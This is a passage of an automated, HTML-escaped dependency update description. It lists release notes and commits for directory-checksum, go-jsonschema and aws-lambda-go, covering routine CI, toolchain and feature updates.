releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.4.18\u003c/h2\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e4ce00c57b5c7d95d5341b2af5d33a125f1559b0b chore(deps): update goreleaser/goreleaser-action action to v7.2.1 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e238103b19a4526004e8be9eaf8853668ab7fd9fd chore(deps): update go toolchain directive to v1.26.3 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/121\"\u003e#121\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ec4d0ac4ccbf366b722c91ad3b00febec87166f27 chore(deps): update robinraju/release-downloader action to v1.13 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/120\"\u003e#120\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e7cc7f005a503338f9980203ed35572d4f4d0d446 chore(deps): update goreleaser/goreleaser-action action to v7.1.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/119\"\u003e#119\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.4.17\u003c/h2\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eb5ec9cb649e9298e020b860d44de3655d8dc99db chore(deps): pin GitHub Actions digests (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/117\"\u003e#117\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e9e14614cba7ea4d2e45bff7d898976b472033023 chore: configure Renovate to pin GitHub Action digests\u003c/li\u003e\n\u003cli\u003ed0db2cce14af7ef180eab64db0a8f413a1b0a2bf chore(deps): update dependency go to v1.26.2 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/116\"\u003e#116\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ee7b210875c142a2858cccb0988451491413f064e chore(deps): update anchore/scan-action action to v7.4.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/115\"\u003e#115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eebcb84ba64784235854e0e9aeed2270a8af825ad chore(deps): update anchore/sbom-action action to v0.24.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/114\"\u003e#114\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edb43f1ecb8acf2c8cf9fa982f75aa762503a563b chore(deps): update actions/setup-go action to v6.4.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/113\"\u003e#113\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ea3f08e15d4a61e1c01cd0fb911db75b13cf66145 chore(deps): update anchore/sbom-action action to v0.23.1 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/112\"\u003e#112\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e3dac27826410e350598c6aa2176dbaa05f6310f6 chore(deps): update dominikh/staticcheck-action action to v1.4.1 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/111\"\u003e#111\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e1c6495a73c454eac1d963a6d8c4e3eda0fb04ec6 chore(deps): update actions/attest-build-provenance action to v4.1.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/110\"\u003e#110\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eb51cc5cb9a579d6c7ba0d18da8d3ce983e46cfba chore(deps): update actions/attest-build-provenance action to v4 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/109\"\u003e#109\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e6c3b5f1771cf4d51dc2ed21e63a8f480b7a7d728 chore(deps): update actions/setup-go action to v6.3.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/108\"\u003e#108\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.4.16\u003c/h2\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e17f5c9e9ca5e402a02dddc513b235dbb27eac6c6 chore(deps): update anchore/sbom-action action to v0.23.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/107\"\u003e#107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e05a7b47be8bcdaaf7107212e8304adae17cf9675 chore(deps): update dependency go to v1.26.1 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/106\"\u003e#106\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e1138ae7b4da6bea17e4c4cf98cf44f88de52f26b chore(deps): update goreleaser/goreleaser-action action to v7 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/105\"\u003e#105\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.4.15\u003c/h2\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ed3231e88115606eff0747a131104d3405d941633 chore(renovate): remove digest pinning from GHA\u003c/li\u003e\n\u003cli\u003ef821a8b45ec07ed8545950646f4bd61115595e00 chore: delete accidentally-committed file\u003c/li\u003e\n\u003cli\u003e068c44d880c0d8638e88d6f2a829f1fe0e20f159 ci: update GitHub action versions from digest to concrete semantic version\u003c/li\u003e\n\u003cli\u003eafc8dbe2c5780828c308a177d2db27bd44c90022 chore(deps): update dependency go to v1.26.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/99\"\u003e#99\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e0f4f17bdc2cf7aa323ba33c43bdf5506f594afd2 chore(deps): update anchore/sbom-action digest to deef08a (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/89\"\u003e#89\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e72ecf231f53888d31e777f32feeceb9f5b83543b chore(deps): update anchore/scan-action digest to 8d2fce0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/90\"\u003e#90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ee65eaab36e0cbbdc3f2018c39695cd63be4d4fac chore(deps): update actions/setup-go digest to 7a3fe6c (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/91\"\u003e#91\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.4.14\u003c/h2\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e835dc1df98d09ea8dcb689bf7ec52255722d5118 chore(deps): update dependency go to v1.25.6 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e1f0a046b816e12c7d68aeb5b4e22d48de5f8d784 chore(deps): update dependency go to v1.25.6 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/94\"\u003e#94\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e1be2511f81925c1af8724c79af0791e39e24b228 chore(deps): update actions/checkout action to v6 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/93\"\u003e#93\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.4.13\u003c/h2\u003e\n\u003ch2\u003eChangelog\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ef138506bd6dac9fd15ba9aa284ac96e1f0087f21 chore(deps): update dependency go to v1.25.5 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/92\"\u003e#92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ebca7d0f7ddedd418cd3ce2cd34795a1e6eab7478 chore(deps): update dependency go (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/87\"\u003e#87\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e8626fc7cf66f87d73abdf757cf0ee18155dac816 chore(deps): update actions/checkout digest to 93cb6ef (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/88\"\u003e#88\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ea82ae184c179610d72dda62204e0065c391232b9 chore(deps): update dependency go to v1.25.4 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/86\"\u003e#86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/4ce00c57b5c7d95d5341b2af5d33a125f1559b0b\"\u003e\u003ccode\u003e4ce00c5\u003c/code\u003e\u003c/a\u003e chore(deps): update goreleaser/goreleaser-action action to v7.2.1 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/238103b19a4526004e8be9eaf8853668ab7fd9fd\"\u003e\u003ccode\u003e238103b\u003c/code\u003e\u003c/a\u003e chore(deps): update go toolchain directive to v1.26.3 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/121\"\u003e#121\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/c4d0ac4ccbf366b722c91ad3b00febec87166f27\"\u003e\u003ccode\u003ec4d0ac4\u003c/code\u003e\u003c/a\u003e chore(deps): update robinraju/release-downloader action to v1.13 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/120\"\u003e#120\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/7cc7f005a503338f9980203ed35572d4f4d0d446\"\u003e\u003ccode\u003e7cc7f00\u003c/code\u003e\u003c/a\u003e chore(deps): update goreleaser/goreleaser-action action to v7.1.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/119\"\u003e#119\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/b5ec9cb649e9298e020b860d44de3655d8dc99db\"\u003e\u003ccode\u003eb5ec9cb\u003c/code\u003e\u003c/a\u003e chore(deps): pin GitHub Actions digests (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/117\"\u003e#117\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/9e14614cba7ea4d2e45bff7d898976b472033023\"\u003e\u003ccode\u003e9e14614\u003c/code\u003e\u003c/a\u003e chore: configure Renovate to pin GitHub Action digests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/d0db2cce14af7ef180eab64db0a8f413a1b0a2bf\"\u003e\u003ccode\u003ed0db2cc\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency go to v1.26.2 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/116\"\u003e#116\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/e7b210875c142a2858cccb0988451491413f064e\"\u003e\u003ccode\u003ee7b2108\u003c/code\u003e\u003c/a\u003e chore(deps): update anchore/scan-action action to v7.4.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/115\"\u003e#115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/ebcb84ba64784235854e0e9aeed2270a8af825ad\"\u003e\u003ccode\u003eebcb84b\u003c/code\u003e\u003c/a\u003e chore(deps): update anchore/sbom-action action to v0.24.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/114\"\u003e#114\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MShekow/directory-checksum/commit/db43f1ecb8acf2c8cf9fa982f75aa762503a563b\"\u003e\u003ccode\u003edb43f1e\u003c/code\u003e\u003c/a\u003e chore(deps): update actions/setup-go action to v6.4.0 (\u003ca href=\"https://redirect.github.com/MShekow/directory-checksum/issues/113\"\u003e#113\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/MShekow/directory-checksum/compare/v1.4.9...v1.4.18\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/atombender/go-jsonschema` from 0.23.0 to 0.23.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/atombender/go-jsonschema/releases\"\u003egithub.com/atombender/go-jsonschema's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.23.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003echore(deps): update dependency shfmt to v3.13.1 by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/omissis/go-jsonschema/pull/539\"\u003eomissis/go-jsonschema#539\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): update dependency markdownlint-cli2 to v0.22.1 by \u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/omissis/go-jsonschema/pull/543\"\u003eomissis/go-jsonschema#543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat/update-deps-2026-05-09 by \u003ca href=\"https://github.com/omissis\"\u003e\u003ccode\u003e@​omissis\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/omissis/go-jsonschema/pull/558\"\u003eomissis/go-jsonschema#558\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix bugs in codegen when the struct has additional fields and constraints at the same time. by \u003ca href=\"https://github.com/eliasdaler\"\u003e\u003ccode\u003e@​eliasdaler\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/omissis/go-jsonschema/pull/545\"\u003eomissis/go-jsonschema#545\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eliasdaler\"\u003e\u003ccode\u003e@​eliasdaler\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/omissis/go-jsonschema/pull/545\"\u003eomissis/go-jsonschema#545\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/omissis/go-jsonschema/compare/v0.23.0...v0.23.1\"\u003ehttps://github.com/omissis/go-jsonschema/compare/v0.23.0...v0.23.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/5c08d7efc3b5e15bed8087f7b61ee495fc02e7ee\"\u003e\u003ccode\u003e5c08d7e\u003c/code\u003e\u003c/a\u003e fix: replace deprecated goreleaser --debug flag with --verbose\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/90500159a9bb1a2db9b129d2fe7358840e8fc93d\"\u003e\u003ccode\u003e9050015\u003c/code\u003e\u003c/a\u003e fix: introduce specialized docker-container builder for buildx to make the sb...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/07df3da82eec596d331373d5b612af8c138fddc2\"\u003e\u003ccode\u003e07df3da\u003c/code\u003e\u003c/a\u003e fix: introduce containerd as driver to work with sbom attestation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/22aebdee3ae9ac352c1bb7b58ee1f346465352a0\"\u003e\u003ccode\u003e22aebde\u003c/code\u003e\u003c/a\u003e Fix bugs in codegen when the struct has additional fields and constraints at ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/0827449a902130ff4b999ff11fa50c7c6cebd6d0\"\u003e\u003ccode\u003e0827449\u003c/code\u003e\u003c/a\u003e feat/update-deps-2026-05-09 (\u003ca href=\"https://redirect.github.com/atombender/go-jsonschema/issues/558\"\u003e#558\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/d7e5ed13483f1389bcf6e3efe05812da0fe5ea88\"\u003e\u003ccode\u003ed7e5ed1\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency markdownlint-cli2 to v0.22.1 (\u003ca href=\"https://redirect.github.com/atombender/go-jsonschema/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/omissis/go-jsonschema/commit/74f12afe078525ec573a5a5393d4fe77eb8e75ce\"\u003e\u003ccode\u003e74f12af\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency shfmt to v3.13.1 (\u003ca href=\"https://redirect.github.com/atombender/go-jsonschema/issues/539\"\u003e#539\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/atombender/go-jsonschema/compare/v0.23.0...v0.23.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-lambda-go` from 1.47.0 to 1.54.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-lambda-go/releases\"\u003egithub.com/aws/aws-lambda-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.54.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow ClientContext.Custom unmarshaling for non-string (JSON) values by \u003ca href=\"https://github.com/M-Elsaeed\"\u003e\u003ccode\u003e@​M-Elsaeed\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/620\"\u003eaws/aws-lambda-go#620\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/M-Elsaeed\"\u003e\u003ccode\u003e@​M-Elsaeed\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/620\"\u003eaws/aws-lambda-go#620\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.54.0...v1.53.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.54.0...v1.53.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.53.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd S3 event optional fields by \u003ca href=\"https://github.com/yhamano0312\"\u003e\u003ccode\u003e@​yhamano0312\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/612\"\u003eaws/aws-lambda-go#612\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate workflows for go 1.26 by \u003ca href=\"https://github.com/bmoffatt\"\u003e\u003ccode\u003e@​bmoffatt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/617\"\u003eaws/aws-lambda-go#617\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix spelling typos by \u003ca href=\"https://github.com/magnetikonline\"\u003e\u003ccode\u003e@​magnetikonline\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/616\"\u003eaws/aws-lambda-go#616\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for Cognito Inbound federation Lambda trigger by \u003ca href=\"https://github.com/maximrub\"\u003e\u003ccode\u003e@​maximrub\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/619\"\u003eaws/aws-lambda-go#619\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yhamano0312\"\u003e\u003ccode\u003e@​yhamano0312\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/612\"\u003eaws/aws-lambda-go#612\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magnetikonline\"\u003e\u003ccode\u003e@​magnetikonline\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/616\"\u003eaws/aws-lambda-go#616\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/maximrub\"\u003e\u003ccode\u003e@​maximrub\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/619\"\u003eaws/aws-lambda-go#619\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.53.0...v1.52.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.53.0...v1.52.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.52.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elambdacontext\u003c/code\u003e feature: Adding structured logging helper by \u003ca href=\"https://github.com/anzheyazzz\"\u003e\u003ccode\u003e@​anzheyazzz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/614\"\u003eaws/aws-lambda-go#614\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anzheyazzz\"\u003e\u003ccode\u003e@​anzheyazzz\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/614\"\u003eaws/aws-lambda-go#614\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.2...v1.52.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.2...v1.52.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: always return PhysicalResourceID for CFn CustomResources by \u003ca href=\"https://github.com/Youssef-Beltagy\"\u003e\u003ccode\u003e@​Youssef-Beltagy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/613\"\u003eaws/aws-lambda-go#613\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Youssef-Beltagy\"\u003e\u003ccode\u003e@​Youssef-Beltagy\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/613\"\u003eaws/aws-lambda-go#613\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.1...v1.51.2\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.1...v1.51.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003edocumentation rework by \u003ca href=\"https://github.com/bmoffatt\"\u003e\u003ccode\u003e@​bmoffatt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/608\"\u003eaws/aws-lambda-go#608\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.0...v1.51.1\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.0...v1.51.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/ca19f6ff85c6e7e87430d86d98d64a2d461dbabf\"\u003e\u003ccode\u003eca19f6f\u003c/code\u003e\u003c/a\u003e Allow ClientContext.Custom unmarshaling for non-string (JSON) values (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/620\"\u003e#620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/9c32960087517ddf57e3d405fae5e8e5e730f4cc\"\u003e\u003ccode\u003e9c32960\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/619\"\u003e#619\u003c/a\u003e from maximrub/inbound-federation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/ebe38d988fd6f254f2c818c1bd12e15df52577f3\"\u003e\u003ccode\u003eebe38d9\u003c/code\u003e\u003c/a\u003e add support for Cognito Inbound federation Lambda trigger\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/71624ac50ffdcb73bce436c791caadfb468a8abc\"\u003e\u003ccode\u003e71624ac\u003c/code\u003e\u003c/a\u003e Fix spelling typos (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/616\"\u003e#616\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/33e4dc3007f6898e4031ac3b04520a21c0a4fb8c\"\u003e\u003ccode\u003e33e4dc3\u003c/code\u003e\u003c/a\u003e Update workflows for go 1.26 (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/617\"\u003e#617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/e1cb4611fc8ef22a40196b19651a33487b846a01\"\u003e\u003ccode\u003ee1cb461\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/612\"\u003e#612\u003c/a\u003e from yhamano0312/feat/add-s3-event-fields\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/a66ce2dc84f235c83f927524f218a106aa3f0c93\"\u003e\u003ccode\u003ea66ce2d\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into feat/add-s3-event-fields\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/9dac8a59d3d97d63314ac5ffc7d12475eaa0a76a\"\u003e\u003ccode\u003e9dac8a5\u003c/code\u003e\u003c/a\u003e Add structured logging helper (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/614\"\u003e#614\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/6252f73f51494b482a1ff1b21b84bb764add35b2\"\u003e\u003ccode\u003e6252f73\u003c/code\u003e\u003c/a\u003e fix: always return PhysicalResourceID for CFn CustomResources (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/613\"\u003e#613\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/be52e48b133401d28c9f19b746989c4f1458b816\"\u003e\u003ccode\u003ebe52e48\u003c/code\u003e\u003c/a\u003e feat: add lifecycle event data structure and corresponding test for S3 